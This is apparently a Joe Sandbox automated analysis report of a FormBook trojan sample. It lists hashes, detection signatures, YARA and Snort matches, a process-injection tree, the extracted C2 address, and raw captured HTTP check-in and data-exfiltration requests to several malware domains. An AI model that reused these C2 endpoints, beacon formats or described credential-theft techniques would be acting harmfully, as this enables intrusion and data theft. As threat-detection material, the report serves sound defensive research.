Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qHpeBvr9cR.exe

Overview

General Information

Sample Name:qHpeBvr9cR.exe
Analysis ID:756313
MD5:f5bea76ffac05afbe19274595801184e
SHA1:93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
SHA256:40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • qHpeBvr9cR.exe (PID: 5588 cmdline: C:\Users\user\Desktop\qHpeBvr9cR.exe MD5: F5BEA76FFAC05AFBE19274595801184E)
    • febcldoukq.exe (PID: 5816 cmdline: "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef MD5: 96E050F99502FE7C52FD9B0F10202578)
      • febcldoukq.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef MD5: 96E050F99502FE7C52FD9B0F10202578)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 3624 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • netsh.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brennancorps.info/henz/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.febcldoukq.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.febcldoukq.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x7d48:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x207a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbff6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1952e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.febcldoukq.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1932c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18dd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1942e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x195a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xbbc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18023:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1f51e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20511:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.febcldoukq.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x1b820:$sqlite3step: 68 34 1C 7B E1
        • 0x1c398:$sqlite3step: 68 34 1C 7B E1
        • 0x1b862:$sqlite3text: 68 38 2A 90 C5
        • 0x1c3dd:$sqlite3text: 68 38 2A 90 C5
        • 0x1b879:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1c3f3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.febcldoukq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5206.233.197.13549710802031453 11/30/22-01:10:42.253815
          SID:2031453
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.214.129.14949712802031453 11/30/22-01:10:50.366888
          SID:2031453
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5206.233.197.13549710802031449 11/30/22-01:10:42.253815
          SID:2031449
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.214.129.14949712802031412 11/30/22-01:10:50.366888
          SID:2031412
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5206.233.197.13549710802031412 11/30/22-01:10:42.253815
          SID:2031412
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.214.129.14949712802031449 11/30/22-01:10:50.366888
          SID:2031449
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: qHpeBvr9cR.exeReversingLabs: Detection: 41%
          Source: qHpeBvr9cR.exeVirustotal: Detection: 36%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0XAvira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0XAvira URL Cloud: Label: malware
          Source: www.brennancorps.info/henz/Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.lyonfinancialusa.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.afterdarksocial.club/henz/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: eufidelizo.comVirustotal: Detection: 8%Perma Link
          Source: www.eufidelizo.comVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeReversingLabs: Detection: 20%
          Machine Learning detection for sample
          Source: qHpeBvr9cR.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeJoe Sandbox ML: detected
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
          Source: qHpeBvr9cR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25293 FindFirstFileExW,1_2_00B25293
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00B25347
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25293 FindFirstFileExW,2_2_00B25293
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00B25347

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.brennancorps.info/henz/
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.185.217.47 192.185.217.47
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 43 78 53 33 28 64 77 2d 6c 4b 73 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jCxS3(dw-lKsshGSVcA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 70 30 37 32 47 35 4c 44 57 56 55 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63ip072G5LDWVUDNF~GIA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:55:23 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:48 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 